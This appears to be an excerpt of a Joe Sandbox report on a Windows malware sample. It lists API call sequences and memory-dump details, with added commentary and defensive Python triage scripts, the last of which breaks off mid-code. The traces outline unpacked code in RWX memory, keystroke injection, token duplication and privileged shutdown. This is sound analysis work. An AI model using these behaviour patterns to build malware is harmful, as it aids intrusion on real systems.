                                                                                                                                                                  • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                  • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 044022F9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                  • Instruction ID: fe1a642603a5391c112bfc18bf8462489172b89a3a622b35b2576ad7a5fc3dbd
                                                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                  • Instruction Fuzzy Hash: 2EE0E67494010DDFDB00DFB4D64D69D7BB4FF04301F1045A1FD01E2280DA709D608A72
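The record above is the one worth pausing on: its Sleep call at 044022F9 is resolved from a dump whose descriptor carries the values 00000040 and 00020000 and is marked "based on PE: false", whereas every other record on this page sits in the image-backed text section at 00401000 (00000020 / 01000000, "based on PE: true"). Read as Win32 PAGE_* and MEM_* constants those two fields are PAGE_EXECUTE_READWRITE and MEM_PRIVATE, i.e. a writable, executable, non-image region inside the analysed process, which is where an unpacked stage normally lives. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the "APIs" / "Memory Dump Source" records in this listing and flags API calls made from memory that is not PE-backed or is both writable and executable. The field layout of the .sdmp descriptor (protection in field 5, allocation type in field 7) is an assumption inferred from the values on this page, not something Joe Sandbox documents here; the sample text is a trimmed, constructed excerpt of three records from this page.

```python
"""Flag Joe Sandbox function records whose code lives outside the PE image.

Added example, not Joe Sandbox code. Assumed (inferred, undocumented) layout of
the .sdmp descriptor: <proc>.<run>.<stamp>.<base>.<protect>.<f6>.<type>.<f8>
with <protect> a Win32 PAGE_* value and <type> a MEM_IMAGE/MEM_PRIVATE/MEM_MAPPED value.
"""
import re
from dataclasses import dataclass, field

# winnt.h memory-protection and allocation-type constants
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_READWRITE, PAGE_WRITECOPY = 0x04, 0x08
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x00020000, 0x00040000, 0x01000000
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<stamp>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp,\s*Offset:\s*[0-9A-Fa-f]+,"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
# "• Name.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function X:"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)(?:\(.*?\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Record:
    apis: list = field(default_factory=list)  # (api, module, call-site address)
    base: int = 0          # start of the dumped region
    protect: int = 0       # PAGE_* value (assumed field 5)
    mem_type: int = 0      # MEM_* value (assumed field 7)
    pe_backed: bool = True


def parse_records(text):
    """Split report text into Records; a new record starts at each 'APIs' header."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:          # tail of a record that began before this excerpt
            continue
        if (m := SOURCE_RE.search(s)):
            cur.base = int(m["base"], 16)
            cur.protect = int(m["protect"], 16)
            cur.mem_type = int(m["type"], 16)
            cur.pe_backed = m["pe"] == "true"
        elif (m := API_RE.search(s)):
            cur.apis.append((m["name"], m["module"], int(m["ref"], 16)))
    return records


def suspicious(rec):
    """Reasons this record's code location looks like unpacked or injected code."""
    reasons = []
    if not rec.pe_backed:
        reasons.append("not backed by a PE image")
    if rec.mem_type == MEM_PRIVATE and rec.protect & EXEC_MASK:
        reasons.append("executable private (non-image) memory")
    if rec.protect & EXEC_MASK and rec.protect & WRITE_MASK:
        reasons.append("writable and executable page")
    return reasons


def triage(text):
    """(api, call site, region base, reasons) for every call made from suspicious memory."""
    out = []
    for rec in parse_records(text):
        reasons = suspicious(rec)
        for name, module, ref in rec.apis:
            if reasons:
                out.append((f"{name}.{module}", ref, rec.base, reasons))
    return out


# Constructed input: a trimmed excerpt of three records from this report page.
SAMPLE = """\
APIs
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• Sleep.KERNEL32(00000000,00000001,004115F6,?,00418256,00000018,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D,?,004115F6), ref: 00416B25
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: AllocateHeapSleep
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• Sleep.KERNELBASE(000001F4), ref: 044022F9
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
"""

if __name__ == "__main__":
    for api, ref, base, reasons in triage(SAMPLE):
        print(f"{api} at {ref:08X} (region {base:08X}): {', '.join(reasons)}")
```

Run against the full report text instead of SAMPLE to get every call site that lives outside the image; on this page only the 04400000 region is reported, and the three reasons fire together on it. If Joe Sandbox's descriptor fields turn out to mean something else, only `SOURCE_RE` and the two `protect`/`mem_type` assignments need to change; the "based on PE: false" check stands on its own.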
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(009A0FF0,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(009A0FF0,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,03311C00,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,03311C00,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease
• String ID: @GUI_DRAGID$F
• API String ID: 115643240-4164748364
• Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
• Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
• GetCurrentThreadId.KERNEL32 ref: 00434485
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
• keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 2889586943-2988720461
• Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
• Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• CloseHandle.KERNEL32(?), ref: 004463A0
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• GetProcessWindowStation.USER32 ref: 004463D1
• SetProcessWindowStation.USER32(00000000), ref: 004463DB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
• LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
• CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
• UnloadUserProfile.USERENV(?,?), ref: 00446555
• CloseWindowStation.USER32(00000000), ref: 0044656C
• CloseDesktop.USER32(?), ref: 0044657A
• SetProcessWindowStation.USER32(?), ref: 00446588
• CloseHandle.KERNEL32(?), ref: 00446592
• DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload
• String ID: $@OH$default$winsta0
• API String ID: 4266742174-3791954436
• Opcode ID: c59e5e30eb208dfc2a579b6e23ab0a432a815ea73a819448e306c539da558518
• Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
• Opcode Fuzzy Hash: c59e5e30eb208dfc2a579b6e23ab0a432a815ea73a819448e306c539da558518
• Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
• Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
• DeleteFileW.KERNEL32(?), ref: 0044BED3
• MoveFileW.KERNEL32(?,?), ref: 0044BEF3
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
• DeleteFileW.KERNEL32(?), ref: 0044BF15
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
• FindClose.KERNEL32(00000000), ref: 0044BF33
• MoveFileW.KERNEL32(?,?), ref: 0044BF4F
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
• FindClose.KERNEL32(00000000), ref: 0044BF7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Find$CloseCopyDeleteMove$AttributesFirstFullNameNextPathlstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 2518010859-1173974218
                                                                                                                                                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                                                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
• SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
• SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
• SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
• SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
• SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FolderPath$LocalTime
• String ID: %.3d
• API String ID: 87575609-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateDirectoryFullNamePath
• String ID: :$\$\??\%s
• API String ID: 2531775907-3457252023
• Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
• Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
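Two of the listings above are easier to read once their numeric arguments are decoded: the nine SHGetFolderPathW calls at 004724EC-004725BC pass the folder they want as the second argument (nFolder, a CSIDL value), and the block at 004333CE-00433479 is the textbook privilege-enable-then-shutdown sequence (LookupPrivilegeValueW for SeShutdownPrivilege, AdjustTokenPrivileges, then ExitWindowsEx / InitiateSystemShutdownExW / SetSystemPowerState). The following Python is an added example for this page, not Joe Sandbox code and not code from the sample: it parses the report's "APIs" line format, resolves nFolder to its shlobj.h CSIDL name, and flags the privilege-then-shutdown call order. The embedded sample listings are copied from the two blocks above; the CSIDL table holds the shlobj.h constants; the call-order check and every function name are this example's own (assumed, not a Joe Sandbox signature).

```python
"""Parse Joe Sandbox "APIs" call lines and decode two of the listings above.

Added example for this report page, not Joe Sandbox code. The embedded sample
listings are copied from the function blocks above; the CSIDL constants are
the shlobj.h values; the call-order check is this example's own heuristic.
"""
import re
from typing import Dict, List, NamedTuple, Optional

# A call line reads "<API>.<MODULE>(<args>), ref: <address>"; the report renders
# GetLastError without an argument list, so the parentheses are optional.
_CALL_RE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# nFolder values from shlobj.h for the CSIDLs the SHGetFolderPathW listing requests.
CSIDL = {
    0x05: "CSIDL_PERSONAL",
    0x16: "CSIDL_COMMON_STARTMENU",
    0x17: "CSIDL_COMMON_PROGRAMS",
    0x19: "CSIDL_COMMON_DESKTOPDIRECTORY",
    0x1F: "CSIDL_COMMON_FAVORITES",
    0x23: "CSIDL_COMMON_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
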